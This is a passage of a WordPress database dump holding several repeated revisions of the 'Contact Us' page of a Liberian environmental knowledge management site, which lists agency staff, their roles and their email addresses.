Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:03:33','2021-01-18 13:03:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3354,42,'2021-01-18 13:03:33','2021-01-18 13:03:33','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:03:33','2021-01-18 13:03:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3355,42,'2021-01-18 13:17:36','2021-01-18 13:17:36','','yokie','','inherit','open','closed','','yokie','','','2021-01-18 13:17:36','2021-01-18 13:17:36','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png',0,'attachment','image/png',0),(3356,42,'2021-01-18 13:18:13','2021-01-18 13:18:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:18:13','2021-01-18 13:18:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3357,42,'2021-01-18 13:18:13','2021-01-18 13:18:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:18:13','2021-01-18 13:18:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3358,42,'2021-01-18 13:18:14','2021-01-18 13:18:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, 